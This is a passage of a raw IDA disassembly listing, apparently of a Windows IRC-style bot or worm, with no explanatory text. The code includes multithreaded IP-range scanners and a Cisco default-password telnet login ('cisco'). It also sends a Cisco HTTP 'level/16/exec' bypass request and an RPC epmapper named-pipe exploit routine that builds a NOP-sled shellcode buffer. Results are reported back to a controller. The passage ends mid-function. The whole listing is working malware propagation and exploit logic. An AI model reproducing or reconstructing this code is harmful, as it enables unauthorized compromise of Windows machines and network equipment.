cmp [ebp+74h+var_4], ebx
jz short loc_40C0A6
jmp short loc_40C085
; ---------------------------------------------------------------------------
loc_40C0B1: ; CODE XREF: sub_40BEFE+1C5�j
push 7D0h
call esi ; Sleep
loc_40C0B8: ; CODE XREF: sub_40BEFE+198�j
mov eax, [ebp+74h+var_2C]
cmp dword_4D1FF4[eax*8], 1
jz short loc_40C0B1
loc_40C0C5: ; CODE XREF: sub_40BEFE+1A6�j
push [ebp+74h+var_30]
mov eax, [ebp+74h+var_2C]
push [ebp+74h+var_38]
mov eax, dword_4D1FF0[eax*8]
push eax
call dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+74h+Source]
push offset asc_432CD4 ; "-"
push eax ; Dest
call _sprintf
add esp, 14h
cmp [ebp+74h+var_10], ebx
jnz short loc_40C113
push ebx ; int
push [ebp+74h+var_14] ; int
lea eax, [ebp+74h+Source]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_3C] ; int
call sub_40123B
add esp, 14h
loc_40C113: ; CODE XREF: sub_40BEFE+1F6�j
lea eax, [ebp+74h+Source]
push eax
call sub_417D70
mov eax, [ebp+74h+var_2C]
mov dword_4D1FF4[eax*8], ebx
mov [esp+20Ch+var_280], 0BB8h
call esi ; Sleep
push 0Bh
call sub_40B075
cmp eax, 1
pop ecx
jnz short loc_40C14A
push offset dword_4D3FF0
call ds:dword_42B078 ; RtlDeleteCriticalSection
loc_40C14A: ; CODE XREF: sub_40BEFE+23F�j
push [ebp+74h+var_2C]
call sub_40B149
pop ecx
push ebx
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_40BEFE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40C15B proc near ; DATA XREF: sub_40274D+2EC6�o
Dest = byte ptr -3F0h
var_1F0 = dword ptr -1F0h
var_1EC = byte ptr -1ECh
var_1DC = byte ptr -1DCh
var_15C = byte ptr -15Ch
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
Format = byte ptr -134h
Str = byte ptr -124h
var_A4 = byte ptr -0A4h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 3F0h
mov eax, [ebp+74h+arg_0]
push ebx
push esi
push edi
push 4Bh
pop ecx
mov esi, eax
lea edi, [ebp+74h+Format]
rep movsd
mov dword ptr [eax+128h], 1
lea eax, [ebp+74h+Format]
push eax
call dword_44417C ; inet_addr
xor edi, edi
cmp dword_43D878, edi
mov [ebp+74h+var_8], eax
mov [ebp+74h+var_4], edi
mov [ebp+74h+arg_0], edi
jz loc_40C2B6
mov esi, offset dword_43D878
mov ebx, offset aNetbios_0 ; "netbios"
loc_40C1B1: ; CODE XREF: sub_40C15B+155�j
push [ebp+74h+var_1C]
push dword ptr [esi]
push [ebp+74h+var_8]
call sub_40BC56
add esp, 0Ch
cmp eax, 1
jnz loc_40C2A5
push dword ptr [esi]
lea eax, [ebp+74h+Format]
push eax
lea eax, [ebx+0Ah]
push eax
lea eax, [ebp+74h+Dest]
push offset asc_432DE8 ; "-"
push eax ; Dest
call _sprintf
push edi ; int
push [ebp+74h+var_14] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_24] ; int
call sub_40123B
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
lea eax, [ebp+74h+Format]
push eax ; Format
lea eax, [ebp+74h+var_1EC]
push eax ; Dest
call _sprintf
lea eax, [ebp+74h+var_15C]
push ebx ; Format
push eax ; Dest
call _sprintf
add esp, 3Ch
cmp [ebp+74h+var_A4], 0
lea eax, [ebp+74h+var_A4]
jnz short loc_40C240
lea eax, [ebp+74h+Str]
loc_40C240: ; CODE XREF: sub_40C15B+DD�j
push eax ; Format
lea eax, [ebp+74h+var_1DC]
push eax ; Dest
call _sprintf
mov eax, [ebp+74h+var_24]
mov [ebp+74h+var_1F0], eax
mov eax, [ebp+74h+var_14]
mov [ebp+74h+var_140], eax
mov eax, [ebp+74h+var_10]
pop ecx
mov [ebp+74h+var_13C], eax
mov eax, [esi]
pop ecx
mov [ebp+74h+var_150], eax
mov eax, [ebp+74h+var_18]
sub esp, 0BCh
mov [ebp+74h+var_14C], eax
mov eax, [ebp+74h+arg_0]
push 2Fh
pop ecx
mov [ebp+74h+var_148], eax
lea esi, [ebp+74h+var_1F0]
mov edi, esp
rep movsd
call dword ptr [ebx+2Ch]
add esp, 0BCh
inc [ebp+74h+var_4]
xor edi, edi
loc_40C2A5: ; CODE XREF: sub_40C15B+69�j
inc [ebp+74h+arg_0]
add ebx, 40h
lea esi, [ebx+28h]
cmp [esi], edi
jnz loc_40C1B1
loc_40C2B6: ; CODE XREF: sub_40C15B+46�j
push [ebp+74h+var_4]
lea eax, [ebp+74h+Format]
push eax
lea eax, [ebp+74h+Dest]
push offset asc_432DB4 ; "-"
push eax ; Dest
call _sprintf
push edi ; int
push [ebp+74h+var_14] ; int
lea eax, [ebp+74h+Dest]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_24] ; int
call sub_40123B
lea eax, [ebp+74h+Dest]
push eax
call sub_417D70
push [ebp+74h+var_18]
call sub_40B149
add esp, 2Ch
push edi
call ds:dword_42B068 ; ExitThread
int 3 ; Trap to Debugger
sub_40C15B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40C30A proc near ; DATA XREF: sub_40C3D3+77�o
; sub_40C4C0+77�o
var_BC = dword ptr -0BCh
Str = byte ptr -0B8h
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0BCh
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 2Bh
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_BC]
rep movsd
xor esi, esi
inc esi
push 10h ; Size
mov [eax+0A8h], esi
lea eax, [ebp+74h+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push [ebp+74h+var_38]
mov [ebp+74h+Dst], 2
call dword_444260 ; htons
push 6
mov [ebp+74h+var_E], ax
mov eax, [ebp+74h+var_28]
push esi
push 2
mov [ebp+74h+var_C], eax
call dword_444100 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40C3C1
push 10h
lea eax, [ebp+74h+Dst]
push eax
push esi
call dword_4440AC ; connect
mov ecx, [ebp+74h+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov dword_4444F4[ecx], esi
jz short loc_40C3C1
push [ebp+74h+var_38]
push [ebp+74h+var_28]
call dword_444188 ; inet_ntoa
push eax
push offset asc_432E18 ; "-"
mov edi, offset byte_4D49B0
push edi ; Dest
call _sprintf
push 0 ; int
push [ebp+74h+var_20] ; int
lea eax, [ebp+74h+Str]
push edi ; int
push eax ; Str
push [ebp+74h+var_BC] ; int
call sub_40123B
push edi
call sub_417D70
add esp, 28h
loc_40C3C1: ; CODE XREF: sub_40C30A+5C�j
; sub_40C30A+7D�j
push esi
call dword_444218 ; closesocket
pop edi
xor eax, eax
pop esi
add ebp, 74h
leave
retn 4
sub_40C30A endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
; int __cdecl sub_40C3D3(int Dst)
sub_40C3D3 proc near ; DATA XREF: sub_40274D+5D4B�o
Source = byte ptr -134h
var_B4 = byte ptr -0B4h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
Src = dword ptr -20h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
Dst = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 134h
push ebx
mov ebx, [ebp+74h+Dst]
push esi
push edi
push 2Bh
pop ecx
mov esi, ebx
lea edi, [ebp+74h+var_B4]
rep movsd
mov esi, ds:dword_42B014
mov dword ptr [ebx+0A4h], 1
xor edi, edi
loc_40C400: ; CODE XREF: sub_40C3D3+E8�j
push [ebp+74h+var_30]
push [ebp+74h+Src]
call dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+74h+Source]
push offset asc_432E40 ; "-"
push eax ; Dest
call _sprintf
push 1FFh ; Count
lea eax, [ebp+74h+Source]
push eax ; Source
mov eax, [ebp+74h+var_24]
imul eax, 234h
add eax, offset dword_4442E8
push eax ; Dest
call _strncpy
add esp, 1Ch
lea eax, [ebp+74h+var_8]
push eax
push edi
lea eax, [ebp+74h+var_B4]
push eax
push offset sub_40C30A
push edi
push edi
call ds:dword_42B03C ; CreateThread
cmp eax, edi
mov [ebp+74h+var_4], eax
jz short loc_40C469
jmp short loc_40C464
; ---------------------------------------------------------------------------
loc_40C460: ; CODE XREF: sub_40C3D3+94�j
push 32h
call esi ; Sleep
loc_40C464: ; CODE XREF: sub_40C3D3+8B�j
cmp [ebp+74h+var_C], edi
jz short loc_40C460
loc_40C469: ; CODE XREF: sub_40C3D3+89�j
push [ebp+74h+var_4]
call ds:dword_42B004 ; CloseHandle
push dword ptr [ebx+8Ch]
mov [ebx+0A8h], edi
call esi ; Sleep
push 4 ; Size
lea eax, [ebp+74h+Src]
push eax ; Src
lea eax, [ebp+74h+Dst]
push eax ; Dst
call _memcpy
add esp, 0Ch
push [ebp+74h+Dst]
call dword_4441DC ; htonl
inc eax
push eax
mov [ebp+74h+Dst], eax
call dword_444234 ; htonl
mov [ebp+74h+Dst], eax
push 4 ; Size
lea eax, [ebp+74h+Dst]
push eax ; Src
lea eax, [ebp+74h+Src]
push eax ; Dst
call _memcpy
add esp, 0Ch
jmp loc_40C400
sub_40C3D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40C4C0 proc near ; DATA XREF: sub_40274D+5A65�o
Source = byte ptr -130h
var_B0 = dword ptr -0B0h
Str = byte ptr -0ACh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 130h
push ebx
mov ebx, [ebp+74h+arg_0]
push esi
push edi
push 2Bh
pop ecx
mov esi, ebx
lea edi, [ebp+74h+var_B0]
rep movsd
mov esi, ds:dword_42B014
mov dword ptr [ebx+0A4h], 1
xor edi, edi
loc_40C4ED: ; CODE XREF: sub_40C4C0+B8�j
push [ebp+74h+var_2C]
push [ebp+74h+var_1C]
call dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+74h+Source]
push offset asc_432E94 ; "-"
push eax ; Dest
call _sprintf
push 1FFh ; Count
lea eax, [ebp+74h+Source]
push eax ; Source
mov eax, [ebp+74h+var_20]
imul eax, 234h
add eax, offset dword_4442E8
push eax ; Dest
call _strncpy
add esp, 1Ch
lea eax, [ebp+74h+var_4]
push eax
push edi
lea eax, [ebp+74h+var_B0]
push eax
push offset sub_40C30A
push edi
push edi
call ds:dword_42B03C ; CreateThread
cmp eax, edi
mov [ebp+74h+arg_0], eax
jz short loc_40C556
jmp short loc_40C551
; ---------------------------------------------------------------------------
loc_40C54D: ; CODE XREF: sub_40C4C0+94�j
push 32h
call esi ; Sleep
loc_40C551: ; CODE XREF: sub_40C4C0+8B�j
cmp [ebp+74h+var_8], edi
jz short loc_40C54D
loc_40C556: ; CODE XREF: sub_40C4C0+89�j
push [ebp+74h+arg_0]
call ds:dword_42B004 ; CloseHandle
push dword ptr [ebx+8Ch]
mov [ebx+0A8h], edi
call esi ; Sleep
mov eax, [ebp+74h+var_2C]
cmp eax, [ebp+74h+var_28]
jz short loc_40C57D
inc [ebp+74h+var_2C]
jmp loc_40C4ED
; ---------------------------------------------------------------------------
loc_40C57D: ; CODE XREF: sub_40C4C0+B3�j
push [ebp+74h+var_1C]
call dword_444188 ; inet_ntoa
push eax
lea eax, [ebp+74h+Source]
push offset asc_432E68 ; "-"
push eax ; Dest
call _sprintf
push edi ; int
push [ebp+74h+var_14] ; int
lea eax, [ebp+74h+Source]
push eax ; int
lea eax, [ebp+74h+Str]
push eax ; Str
push [ebp+74h+var_B0] ; int
call sub_40123B
push [ebp+74h+var_20]
call sub_40B149
add esp, 24h
pop edi
pop esi
xor eax, eax
pop ebx
add ebp, 74h
leave
retn 4
sub_40C4C0 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 290h
push esi
push edi
xor esi, esi
push esi
push 1
push 2
call dword_444100 ; socket
mov edi, eax
cmp edi, esi
jl loc_40C72B
push 10h
lea eax, [ebp-10h]
push esi
push eax
call _memset
add esp, 0Ch
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-10h], 2
call dword_44417C ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-0Ch], eax
call dword_444260 ; htons
mov [ebp-0Eh], ax
push 10h
lea eax, [ebp-10h]
push eax
push edi
call dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jz loc_40C72B
push 40h
lea eax, [ebp-50h]
push esi
push eax
call _memset
push 40h
lea eax, [ebp-90h]
push esi
push eax
call _memset
add esp, 18h
push esi
push 40h
lea eax, [ebp-50h]
push eax
push edi
call dword_444064 ; recv
test eax, eax
jle loc_40C72B
push esi
push 40h
lea eax, [ebp-50h]
push eax
push edi
call dword_444064 ; recv
push esi
push 6
push offset aCisco ; "cisco\r"
push edi
call dword_4441A0 ; send
push esi
push 40h
lea eax, [ebp-90h]
push eax
push edi
call dword_444064 ; recv
push 6
lea eax, [ebp-90h]
push offset aPass ; "\r\nPass"
push eax
call _memcmp
add esp, 0Ch
test eax, eax
jz short loc_40C72B
push 28h
lea eax, [ebp-50h]
push offset aUserAccessVeri ; "\r\n\r\nUser Access Verification\r\n\r\nPasswor"...
push eax
call _memcmp
add esp, 0Ch
test eax, eax
jnz short loc_40C72B
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
shl eax, 6
add eax, offset aNetbios ; "NetBios"
push eax
push offset unk_432EC0
lea eax, [ebp-290h]
push 200h
push eax
call __snprintf
push esi
push dword ptr [ebp+0B8h]
lea eax, [ebp-290h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_40123B
lea eax, [ebp-290h]
push eax
call sub_417D70
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D880[eax]
add esp, 2Ch
inc dword ptr [eax]
xor eax, eax
inc eax
jmp short loc_40C72D
; ---------------------------------------------------------------------------
loc_40C72B: ; CODE XREF: .text:0040C5E2�j
; .text:0040C62A�j ...
xor eax, eax
loc_40C72D: ; CODE XREF: .text:0040C729�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 1210h
call __alloca_probe
push ebx
push esi
push edi
xor ebx, ebx
push ebx
push 1
push 2
call dword_444100 ; socket
mov edi, eax
cmp edi, ebx
jl loc_40C894
push 10h
lea eax, [ebp-10h]
push ebx
push eax
call _memset
add esp, 0Ch
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-10h], 2
call dword_44417C ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-0Ch], eax
call dword_444260 ; htons
mov [ebp-0Eh], ax
push 10h
lea eax, [ebp-10h]
push eax
push edi
call dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jz loc_40C894
push ebx
mov esi, offset aGetLevel16Exec ; "GET /level/16/exec/-///pwd HTTP/1.0\n\n"
push esi
call _strlen
pop ecx
push eax
push esi
push edi
call dword_4441A0 ; send
test eax, eax
jl loc_40C894
mov esi, 1000h
push esi
lea eax, [ebp-1210h]
push ebx
push eax
call _memset
add esp, 0Ch
push ebx
push esi
lea eax, [ebp-1210h]
push eax
push edi
call dword_444064 ; recv
mov esi, eax
cmp esi, ebx
jl loc_40C894
push edi
call dword_444218 ; closesocket
cmp esi, 5
jl loc_40C894
lea eax, [ebp-1210h]
push offset aHttp1_0200Ok ; "HTTP/1.0 200 OK"
push eax
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40C894
lea eax, [ebp-1210h]
push offset aCisco_0 ; "cisco"
push eax
call _strstr
test eax, eax
pop ecx
pop ecx
jz short loc_40C894
lea eax, [ebp+0Ch]
push eax
mov eax, [ebp+0B0h]
shl eax, 6
add eax, offset aNetbios ; "NetBios"
push eax
push offset unk_432F24
lea eax, [ebp-210h]
push 200h
push eax
call __snprintf
push ebx
push dword ptr [ebp+0B8h]
lea eax, [ebp-210h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_40123B
lea eax, [ebp-210h]
push eax
call sub_417D70
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D880[eax]
add esp, 2Ch
inc dword ptr [eax]
xor eax, eax
inc eax
jmp short loc_40C896
; ---------------------------------------------------------------------------
loc_40C894: ; CODE XREF: .text:0040C752�j
; .text:0040C79A�j ...
xor eax, eax
loc_40C896: ; CODE XREF: .text:0040C892�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C89B proc near ; CODE XREF: .text:0040CC6F�p
; .text:004105B1�p
Dest = word ptr -354h
var_34E = byte ptr -34Eh
Source = word ptr -124h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 354h
push ebx
push esi
push edi
mov esi, offset off_432F8C
lea edi, [ebp+var_C]
movsd
movsd
movsd
mov esi, offset asc_432F84 ; "\\\\"
lea edi, [ebp+Dest]
movsd
movsw
xor eax, eax
mov ecx, 8Ah
lea edi, [ebp+var_34E]
rep stosd
push 45h
stosw
pop ecx
xor ebx, ebx
xor eax, eax
mov byte ptr [ebp+Source], bl
lea edi, [ebp+Source+1]
rep stosd
stosw
push 0FFh
stosb
lea eax, [ebp+Source]
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push ebx
push ebx
call ds:dword_42B07C ; MultiByteToWideChar
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _wcscat
lea eax, [ebp+var_C]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _wcscat
mov esi, [ebp+arg_4]
add esp, 10h
lea eax, [ebp+Dest]
push ebx
mov [esi+14h], eax
mov eax, offset dword_432F80
push eax
push eax
push esi
mov [esi+4], ebx
mov [esi+10h], ebx
mov [esi+1Ch], ebx
call dword_444240
cmp eax, 5
mov edi, 4C3h
jz short loc_40C95A
cmp eax, edi
jnz short loc_40C964
loc_40C95A: ; CODE XREF: sub_40C89B+B9�j
push ebx
push ebx
push ebx
push esi
call dword_444240
loc_40C964: ; CODE XREF: sub_40C89B+BD�j
cmp eax, 5
jz short loc_40C972
cmp eax, edi
jz short loc_40C972
xor eax, eax
inc eax
jmp short loc_40C974
; ---------------------------------------------------------------------------
loc_40C972: ; CODE XREF: sub_40C89B+CC�j
; sub_40C89B+D0�j
xor eax, eax
loc_40C974: ; CODE XREF: sub_40C89B+D5�j
pop edi
pop esi
pop ebx
leave
retn
sub_40C89B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C979 proc near ; CODE XREF: .text:0040CCC1�p
; .text:0040CDA1�p ...
Dest = word ptr -354h
var_34E = byte ptr -34Eh
Source = word ptr -124h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 354h
push ebx
push esi
push edi
mov esi, offset off_432F8C
lea edi, [ebp+var_C]
movsd
movsd
movsd
mov esi, offset asc_432F84 ; "\\\\"
lea edi, [ebp+Dest]
movsd
movsw
xor eax, eax
mov ecx, 8Ah
lea edi, [ebp+var_34E]
rep stosd
push 45h
stosw
pop ecx
xor ebx, ebx
xor eax, eax
mov byte ptr [ebp+Source], bl
lea edi, [ebp+Source+1]
rep stosd
stosw
push 0FFh
stosb
lea eax, [ebp+Source]
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push ebx
push ebx
call ds:dword_42B07C ; MultiByteToWideChar
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _wcscat
lea eax, [ebp+var_C]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _wcscat
add esp, 10h
jmp short loc_40CA13
; ---------------------------------------------------------------------------
loc_40CA08: ; CODE XREF: sub_40C979+AB�j
push 7D0h
call ds:dword_42B014 ; Sleep
loc_40CA13: ; CODE XREF: sub_40C979+8D�j
push ebx
lea eax, [ebp+Dest]
push ebx
push eax
call dword_444090
test eax, eax
jnz short loc_40CA08
pop edi
pop esi
inc eax
pop ebx
leave
retn
sub_40C979 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA2C proc near ; CODE XREF: .text:0040CCED�p
; .text:0040CE2E�p
Src = byte ptr -2000h
var_1FDC = byte ptr -1FDCh
Dst = byte ptr -1FD0h
var_1F29 = byte ptr -1F29h
var_1000 = byte ptr -1000h
var_FF8 = dword ptr -0FF8h
var_FF0 = dword ptr -0FF0h
var_F80 = dword ptr -0F80h
var_F7C = dword ptr -0F7Ch
var_F4C = dword ptr -0F4Ch
var_F48 = dword ptr -0F48h
var_F30 = dword ptr -0F30h
var_E74 = dword ptr -0E74h
var_CA0 = dword ptr -0CA0h
var_C98 = dword ptr -0C98h
var_C90 = byte ptr -0C90h
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
mov eax, 2000h
call __alloca_probe
push ebx
push esi
push edi
push 30h ; Size
lea eax, [ebp+Src]
push offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
push eax ; Dst
mov edi, 0A7h
call _memcpy
push edi ; Size
lea eax, [ebp+Dst]
push 0FFFFFF90h ; Val
push eax ; Dst
call _memset
push 159h ; Size
mov ebx, offset dword_43E620
lea eax, [ebp+var_1F29]
push ebx ; Src
push eax ; Dst
call _memcpy
add esp, 24h
loc_40CA7D: ; CODE XREF: sub_40CA2C+9B�j
push 30h ; Size
lea eax, [ebp+Src]
push offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
push eax ; Dst
inc edi
call _memcpy
push edi ; Size
lea eax, [ebp+Dst]
push 0FFFFFF90h ; Val
push eax ; Dst
call _memset
push 159h ; Size
lea eax, [ebp+edi+Dst]
push ebx ; Src
push eax ; Dst
call _memcpy
add esp, 24h
lea esi, [edi+189h]
mov eax, esi
push 10h
cdq
pop ecx
idiv ecx
cmp edx, 0Ch
jnz short loc_40CA7D
cmp [ebp+arg_C4], 0
jz short loc_40CAE4
cmp [ebp+arg_C0], 3
jz short loc_40CAED
cmp [ebp+arg_C0], 0
jmp short loc_40CAEB
; ---------------------------------------------------------------------------
loc_40CAE4: ; CODE XREF: sub_40CA2C+A4�j
cmp [ebp+arg_C0], 3
loc_40CAEB: ; CODE XREF: sub_40CA2C+B6�j
jnz short loc_40CAF6
loc_40CAED: ; CODE XREF: sub_40CA2C+AD�j
push 4
push offset dword_43E61C
jmp short loc_40CAFD
; ---------------------------------------------------------------------------
loc_40CAF6: ; CODE XREF: sub_40CA2C:loc_40CAEB�j
push 4 ; Size
push offset dword_43E618 ; Src
loc_40CAFD: ; CODE XREF: sub_40CA2C+C8�j
lea eax, [ebp+var_1FDC]
push eax ; Dst
call _memcpy
add esp, 0Ch
push 360h ; Size
lea eax, [ebp+var_1000]
push offset dword_43E150 ; Src
push eax ; Dst
call _memcpy
push 10h ; Size
lea eax, [ebp+var_CA0]
push offset dword_43E4B4 ; Src
push eax ; Dst
call _memcpy
push esi ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [ebp+var_C90]
push eax ; Dst
call _memcpy
push 3Ch ; Size
lea edi, [esi+370h]
lea eax, [ebp+edi+var_1000]
push offset off_43E4C8 ; Src
push eax ; Dst
call _memcpy
push 30h ; Size
add edi, 3Ch
lea eax, [ebp+edi+var_1000]
push offset dword_43E508 ; Src
push eax ; Dst
call _memcpy
mov eax, esi
cdq
sub eax, edx
sar eax, 1
add [ebp+var_CA0], eax
add [ebp+var_C98], eax
mov eax, [ebp+var_FF8]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FF8], eax
mov eax, [ebp+var_FF0]
lea eax, [eax+esi-0Ch]
mov [ebp+var_FF0], eax
mov eax, [ebp+var_F80]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F80], eax
mov eax, [ebp+var_F7C]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F7C], eax
mov eax, [ebp+var_F4C]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F4C], eax
mov eax, [ebp+var_F48]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F48], eax
mov eax, [ebp+var_F30]
lea eax, [eax+esi-0Ch]
mov [ebp+var_F30], eax
mov eax, [ebp+var_E74]
lea eax, [eax+esi-0Ch]
add edi, 30h
lea esi, [edi+1]
push esi ; Size
mov [ebp+var_E74], eax
call _malloc
add esp, 40h
push esi ; Size
mov ebx, eax
push 0 ; Val
push ebx ; Dst
call _memset
push edi ; Size
lea eax, [ebp+var_1000]
push eax ; Src
push ebx ; Dst
call _memcpy
mov eax, [ebp+arg_BC]
mov [eax], edi
add esp, 18h
mov eax, ebx
pop edi
pop esi
pop ebx
leave
retn
sub_40CA2C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 1138h
call __alloca_probe
cmp dword ptr [ebp+0A8h], 1BDh
push ebx
push esi
push edi
jnz loc_40CDB5
lea eax, [ebp-34h]
push eax
lea eax, [ebp+0Ch]
push eax
call sub_40C89B
test eax, eax
pop ecx
pop ecx
jz loc_40CEC5
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-138h]
push offset aSPipeEpmapper ; "\\\\%s\\pipe\\epmapper"
push eax
call _sprintf
add esp, 0Ch
xor ebx, ebx
push ebx
push 80h
push 3
push ebx
push 1
push 0C0000000h
lea eax, [ebp-138h]
push eax
call ds:dword_42B08C ; CreateFileA
mov [ebp-4], eax
cmp eax, 0FFFFFFFFh
lea eax, [ebp+0Ch]
jnz short loc_40CCCC
loc_40CCC0: ; CODE XREF: .text:0040CD6D�j
push eax
call sub_40C979
pop ecx
jmp loc_40CEC5
; ---------------------------------------------------------------------------
loc_40CCCC: ; CODE XREF: .text:0040CCBE�j
push 2
push eax
call sub_41AA0A
pop ecx
pop ecx
push 1
push eax
lea eax, [ebp-10h]
push eax
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_40CA2C
add esp, 0C8h
cmp eax, ebx
mov [ebp-8], eax
jz short loc_40CD61
mov edi, 186A0h
push edi
call _malloc
push edi
mov esi, eax
push ebx
push esi
call _memset
add esp, 10h
push ebx
lea eax, [ebp-0Ch]
push eax
mov edi, 2710h
push edi
push esi
push 48h
push offset dword_43E100
push dword ptr [ebp-4]
call ds:dword_42B088 ; TransactNamedPipe
cmp byte ptr [esi+2], 0Ch
jnz short loc_40CD51
push ebx
lea eax, [ebp-14h]
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-8]
push dword ptr [ebp-4]
call ds:dword_42B084 ; WriteFile
test eax, eax
jnz short loc_40CD72
loc_40CD51: ; CODE XREF: .text:0040CD37�j
push esi
call _free
push dword ptr [ebp-8]
call _free
pop ecx
pop ecx
loc_40CD61: ; CODE XREF: .text:0040CCFD�j
push dword ptr [ebp-4]
call ds:dword_42B004 ; CloseHandle
lea eax, [ebp+0Ch]
jmp loc_40CCC0
; ---------------------------------------------------------------------------
loc_40CD72: ; CODE XREF: .text:0040CD4F�j
push ebx
lea eax, [ebp-0Ch]
push eax
push edi
push esi
push dword ptr [ebp-4]
call ds:dword_42B080 ; ReadFile
push dword ptr [ebp-8]
mov edi, eax
call _free
push esi
call _free
pop ecx
pop ecx
push dword ptr [ebp-4]
call ds:dword_42B004 ; CloseHandle
lea eax, [ebp+0Ch]
push eax
call sub_40C979
cmp edi, 1
pop ecx
jnz loc_40CED6
jmp loc_40CEC5
; ---------------------------------------------------------------------------
loc_40CDB5: ; CODE XREF: .text:0040CC61�j
lea eax, [ebp+0Ch]
push 1
push eax
call sub_41AA0A
mov esi, eax
cmp esi, 1
pop ecx
pop ecx
jz loc_40CEC5
xor ebx, ebx
push ebx
push 1
push 2
call dword_444100 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jz loc_40CEC5
push 10h
lea eax, [ebp-24h]
push ebx
push eax
call _memset
add esp, 0Ch
push dword ptr [ebp+0A8h]
mov word ptr [ebp-24h], 2
call dword_444260 ; htons
mov [ebp-22h], ax
lea eax, [ebp+0Ch]
push eax
call dword_44417C ; inet_addr
push ebx
push esi
mov [ebp-20h], eax
lea eax, [ebp-0Ch]
push eax
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_40CA2C
mov esi, eax
add esp, 0C8h
cmp esi, ebx
mov [ebp-8], esi
jnz short loc_40CE47
push dword ptr [ebp-4]
jmp short loc_40CEBF
; ---------------------------------------------------------------------------
loc_40CE47: ; CODE XREF: .text:0040CE40�j
mov edi, [ebp-4]
push 10h
lea eax, [ebp-24h]
push eax
push edi
